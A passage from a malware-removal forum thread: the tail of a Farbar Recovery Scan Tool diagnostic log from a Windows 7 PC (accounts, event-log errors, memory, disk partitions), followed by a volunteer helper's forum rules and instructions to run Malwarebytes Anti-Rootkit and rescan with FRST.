(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Users\Randy\AppData\Roaming\Microsoft Access 97-2003.EML:OECustomProperty

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-756768628-1363961526-1356878247-500 - Administrator - Disabled)
Guest (S-1-5-21-756768628-1363961526-1356878247-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-756768628-1363961526-1356878247-1016 - Limited - Enabled)
JThakur (S-1-5-21-756768628-1363961526-1356878247-1014 - Limited - Enabled) => C:\Users\JThakur
Randy (S-1-5-21-756768628-1363961526-1356878247-1000 - Administrator - Enabled) => C:\Users\Randy
VMcGlynn (S-1-5-21-756768628-1363961526-1356878247-1015 - Administrator - Enabled) => C:\Users\VMcGlynn

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (12/15/2014 09:31:23 PM) (Source: Windows Backup) (EventID: 4103) (User: )
Description: The backup did not complete because of an error writing to the backup location F:\. The error is: The backup location cannot be found or is not valid. Review your backup settings and check the backup location. (0x81000006).

Error: (12/14/2014 10:02:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x3244
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 10:02:17 PM) (Source: Microsoft Office 12) (EventID: 2001) (User: )
Description: Rejected Safe Mode action : Microsoft Office Outlook.

Error: (12/14/2014 09:43:52 PM) (Source: Report Server Windows Service (MSSQLSERVER)) (EventID: 107) (User: )
Description: Report Server Windows Service (MSSQLSERVER) cannot connect to the report server database.

Error: (12/14/2014 09:38:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x2bb0
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 09:37:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x7494
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 09:36:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x63d0
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 09:35:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x1df0
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 09:33:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x5078
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 02:00:19 AM) (Source: Windows Backup) (EventID: 4103) (User: )
Description: The backup did not complete because of an error writing to the backup location F:\. The error is: The backup location cannot be found or is not valid. Review your backup settings and check the backup location. (0x81000006).

System errors:
=============
Error: (12/15/2014 09:52:16 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/14/2014 09:45:53 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Client/Server Security Agent RealTime Scan service hung on starting.

Error: (12/14/2014 09:43:43 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/14/2014 09:42:30 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NTRU TSS v1.2.1.29 TCS service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (12/12/2014 05:22:36 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {4991D34B-80A1-4291-83B6-3328366B9097}

Error: (12/12/2014 05:20:56 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/12/2014 05:20:34 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Client/Server Security Agent RealTime Scan service hung on starting.

Error: (12/12/2014 05:18:34 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NTRU TSS v1.2.1.29 TCS service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (12/11/2014 07:20:45 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Client/Server Security Agent RealTime Scan service hung on starting.

Error: (12/11/2014 07:19:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The SQL Server Reporting Services (MSSQLSERVER) service failed to start due to the following error:
%%1053

Microsoft Office Sessions:
=========================
Error: (09/12/2014 07:31:15 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 86484 seconds with 1500 seconds of active time.  This session ended with a crash.

Error: (04/08/2014 09:05:07 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 1205470 seconds with 660 seconds of active time.  This session ended with a crash.

Error: (05/27/2013 01:32:13 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 4 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (02/21/2013 07:06:31 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 26 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (11/30/2012 00:24:08 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6665.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 1031 seconds with 840 seconds of active time.  This session ended with a crash.

Error: (03/19/2012 02:41:43 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 2, Application Name: Microsoft Office Access, Application Version: 12.0.6606.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 72 seconds with 60 seconds of active time.  This session ended with a crash.

Error: (03/04/2012 07:19:09 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 2, Application Name: Microsoft Office Access, Application Version: 12.0.6606.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 512 seconds with 480 seconds of active time.  This session ended with a crash.

Error: (03/04/2012 07:10:26 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 2, Application Name: Microsoft Office Access, Application Version: 12.0.6606.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 603 seconds with 600 seconds of active time.  This session ended with a crash.

Error: (02/21/2012 03:52:45 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 2, Application Name: Microsoft Office Access, Application Version: 12.0.6606.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 16355 seconds with 6060 seconds of active time.  This session ended with a crash.

Error: (02/20/2012 07:00:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 2, Application Name: Microsoft Office Access, Application Version: 12.0.6606.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 21 seconds with 0 seconds of active time.  This session ended with a crash.

==================== Memory info ===========================

Processor: Intel® Xeon® CPU E5503 @ 2.00GHz
Percentage of memory in use: 57%
Total physical RAM: 3069.55 MB
Available physical RAM: 1296.35 MB
Total Pagefile: 6137.4 MB
Available Pagefile: 3463.21 MB
Total Virtual: 2047.88 MB
Available Virtual: 1917.45 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:464.99 GB) (Free:347.68 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 77E3ED41)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=750 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=465 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 

 

 


  • Staff

Hello,
    
 
They call me TwinHeadedEagle around here, and I'll be working with you.
 
     
    
Before we start please read and note the following:

  • Limit your internet access to posting here; some infections just wait to steal typed-in passwords.
  • Please be patient. I know it is frustrating when your PC isn't working properly, but malware removal takes time.
  • Don't run any scripts or tools on your own; unsupervised usage may cause more harm than good.
  • Do not paste the logs in your posts; attachments make my work easier. There is a More Reply Options button that gives you an Upload Files option below, which you can use to attach your reports. Always attach reports from all tools.
  • Always execute my instructions in the given order. If for some reason you cannot completely follow one instruction, inform me about that.
  • Stay with me to the end; the absence of symptoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, which may cause some delays between answers.
  • Do not ask for help for your business PC. Companies are making revenue via computers, so it is a good thing to pay someone to repair it.
  • If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.

I can't foresee everything, so if anything unexpected happens, please stop and inform me!
There are no silly questions. Never be afraid to ask if in doubt!
 
 
 
Rules and policies

We won't support any piracy.
That being said, if any evidence of an illegal OS, software, cracks/keygens or anything similar is revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!
The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result in closing your topic and withdrawing any assistance.
 
 
 
 

Download Malwarebytes Anti-Rootkit to your desktop.

  • Double-click the icon to start the tool.
  • It will ask you where to extract it, then it will start.
  • Warning! Malwarebytes Anti-Rootkit needs to be run from an account with administrator rights.
  • In the introduction screen, click "Next" to continue.
  • In the following screen, click "Update" to obtain the latest malware definitions.
  • Once the update is complete, select "Next" and click "Scan".
  • When the scan is finished and no malware has been found, select "Exit".
  • If malware was detected, make sure to check all the items and click "Cleanup". Reboot your computer.
  • Open the MBAR folder and paste the content of the following files in your next reply:
    • "mbar-log-{date} (xx-xx-xx).txt"
    • "system-log.txt"

 

 

Scan with Farbar Recovery Scan Tool
 
Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users: click Run after receipt of the Windows Security Warning - Open File.)
  • Make sure that the Addition option is checked.
  • Press the Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please upload them into your next reply.

This topic is now closed to further replies.